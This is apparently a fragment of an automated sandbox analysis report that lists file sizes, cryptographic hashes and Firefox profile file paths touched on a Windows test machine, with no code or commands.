Filesize
58KB
MD56c4d3cdb221c23c4db584b693f26c2b2
SHA17dab06d992efa2e8ca9376d6144ef5ee2bbd6514
SHA25647c6c4b2d283aec460b25ec54786793051e515a0cbc37c5b66d1a19c3c4fb4ac
SHA5125bdb1c70af495d7dc2f770f3d9ceecaa2f1e588338ebd80a5256075a7b6383e227f8c6b7208066764925fb0d56fa60391cef168569273642398da419247fbe76
-
Filesize
1.4MB
MD5908a4b6a40668f3547a1cea532a0b22e
SHA12d24506f7d3a21ca5b335ae9edc7b9ba30fce250
SHA2561c0e7388e7d42381fd40a97bd4dab823c3da4a3a534a2aa50e91665a57fb3566
SHA512e03950b1939f8a7068d2955d5d646a49f2931d64f6816469ac95f425bfeeabff401bb7dd863ad005c4838b07e9b8095a81552ffb19dbef6eda662913f9358af6
-
Filesize
65KB
MD50e105f62fdd1ff4157560fe38512220b
SHA199bd69a94b3dc99fe2c0f7bbbcd05aa0bc8cd45c
SHA256803ba8242b409080df166320c05a4402aab6dd30e31c4389871f4b68ca1ad423
SHA51259c0f749ed9c59efdbcd04265b4985b1175fdd825e5a307745531ed2537397e739bc9290fdc3936cfd04f566e28bb76b878f124248b8344cf74f641c6b1101de
-
Filesize
1.6MB
MD51dee750e8554c5aa19370e8401ff91f9
SHA12fb01488122a1454aa3972914913e84243757900
SHA256fd69ba232ba3b03e8f5faea843919a02d76555900a66a1e290e47bc8c0e78bfa
SHA5129047a24a6621a284d822b7d68477c01c26dc42eccc4ccc4144bfd5d92e89ea0c854dc48685268f1ae3ca196fd45644a038a2c86d4c1cc0dbf21ca492aece0c9e
-
Filesize
1011KB
MD5849959a003fa63c5a42ae87929fcd18b
SHA1d1b80b3265e31a2b5d8d7da6183146bbd5fb791b
SHA2566238cbfe9f57c142b75e153c399c478d492252fda8cb40ee539c2dcb0f2eb232
SHA51264958dabdb94d21b59254c2f074db5d51e914ddbc8437452115dff369b0c134e50462c3fdbbc14b6fa809a6ee19ab2fb83d654061601cc175cddcb7d74778e09
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD534a6ac1fec0b84dac8301a70322231df
SHA18d9384ae55556cb5a5283a060cf8145a6b37d067
SHA256f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0
SHA51209a422872484ef19a1fc72371b08affd781c9571e96fc293a79df829b62b5188fa9124515e7384e652f333b42f097b6f9044ce37e359d8f9085edf06d28ae567
-
Filesize
330KB
MD5aee2a2249e20bc880ea2e174c627a826
SHA1aa87ed4403e676ce4f4199e3f9142aeba43b26d9
SHA2564d9c00fc77e231366228a938868306a71383967472d0bbf1a89afe390d80599c
SHA5124e96c2aa60cc1904ac5c86389f5d1226baf4ef81e2027369979ec253b383eccc666da268647843d1db128af16d1504cdc7c77757ad4147a0332ec9f90041a110
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin
Filesize8KB
MD51f4fb60e0c6c7a8af0698a681ceccca8
SHA1ea767f9af14efecd957bdae0a4a71ca71bf41bf9
SHA25641b4fea60fd88f9f58d571273a625a3549905775b71e6de3698c477ddea06663
SHA5127c49f162ad55b9797565d8f625f736589f5c06c854be17f39d4322671cf15b1bd773e8ec9fcfcc84505f614ea5c9a5d3cfccf88825a102e8886cceff9e4e061d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin
Filesize11KB
MD5b4efe6ff93f14f7fbb3668cadfeed632
SHA10013f2edabe5a806344b957b8cf29de00794765c
SHA25654086d4cb49fa10d3a265cd1d372a0e604fcbafa90fbc4bac6013cd4e393d86e
SHA512b47d88ba08c6aea7ada5e1779320ad9480e4c2a5fe6f161362c66559d006aca655294dee6ab00bb15e45aeb25259aa71bdce09294719e0c2802bc101cf2d6ccd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5e2ce4f3d0779e5b849fd14a49e5d6fce
SHA1125dcdc3648412007491e0fe4064916485ca9fb7
SHA256226a759f350f6c714c1f8d0e602ab62573c425bc96845b32f7fce9a7911db160
SHA512104f3d2e3da75a54fd534188340e0f7b4f552ab3f165f135a1f73463f8ee7b41443b8f9ea3aee02d2c6da85419248a195310bd11bd6ee9c347247aaa1c65ef16
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\09c073e6-21e7-45d0-81d7-893fc402430a
Filesize671B
MD5588b6462ad487af4ebcf3759ddcdfa44
SHA144e0e4996f82778b3b4345637166063aaf4a896d
SHA2568e262653f8ac2b1a53da977987a755beb1f1731cf69a8d7bc995b310b705d903
SHA512c1e0d3f97fb8160da2b184c013dd9f4ec2a07c4e5ca1cae2aeaa8804b14d9c60fe787a23312dd22bfef98164e30c7fc1585c4e08667e91c1da9d3c76f88a246c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\0e68b582-b772-47b6-83ea-d19a15671df4
Filesize27KB
MD5263a119f992bdc8dedc88e18e2dc74d4
SHA1391c7d741a63bf8d0eb0a751813781bbfd7f8a8a
SHA256dbaa79883c449d0cbc98de2c31da409715bd1e593c61984c9b2e1f7e90687115
SHA5129cf76cc72f943c9fb9c2c47a3e47d95a54766aad1b33708baa8429b5d95a9c98faaf3cdfe3a63fa00ed7041d44ed2c04225b770dd0328e8d2704aa22191e94c5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\25fb605b-be71-4f33-8c3e-485b7f376290
Filesize982B
MD592656436123b2bc75b4bb3df167cfb5f
SHA101837676df2829a19498b92bc8be64f4feaa36d9
SHA25605604adafbbb2459c75f8ad7617c5cc4a5ea2d87d0c79a73fdf45bca9923bc92
SHA512b172edd45fff4631de2f80718106cfe7d26a3c61ef6440d437c8c02fb34b2e5d264aca179fdc7236d7d479b458c3a7eb24ac893c2b0817a49ea3de708fd2dbb7
-
Filesize
9KB
MD58ecbd1273fd09f2ce4b037f6c72c5581
SHA10d27fba5dfc4ad81ded2cc4d1887c2e6bb198fd0
SHA2569b42203a11f0eed4878766785e617b6fc979f7c712b3c0ab4d815e73b94822bc
SHA512df676d896e53c875c240d95453bf7a4074ca2e10da7298d7d898496f9762a590fca362005feaf13741c42e917e85b5bc3cd63d60e062bb1b65dc86d2086a75cb
-
Filesize
9KB
MD5036f4147662d42056cff0cc2d8bb4d90
SHA1e6ed58c0b933de8e4eeeb41cd76137bba9a3dcce
SHA256815b76ee5853cc540a36ae87f1ca5faf11d3df0cd3ba354d05ceb21aa0fafa4a
SHA512e063e41aea5d011cc6a91c6aaf7a2920165d9f6aa9d109fe7098c02dfaae99486bdc0aebda067c3a8e42ad58305256f0637738b91ceaa47ef7799eae946e8fe4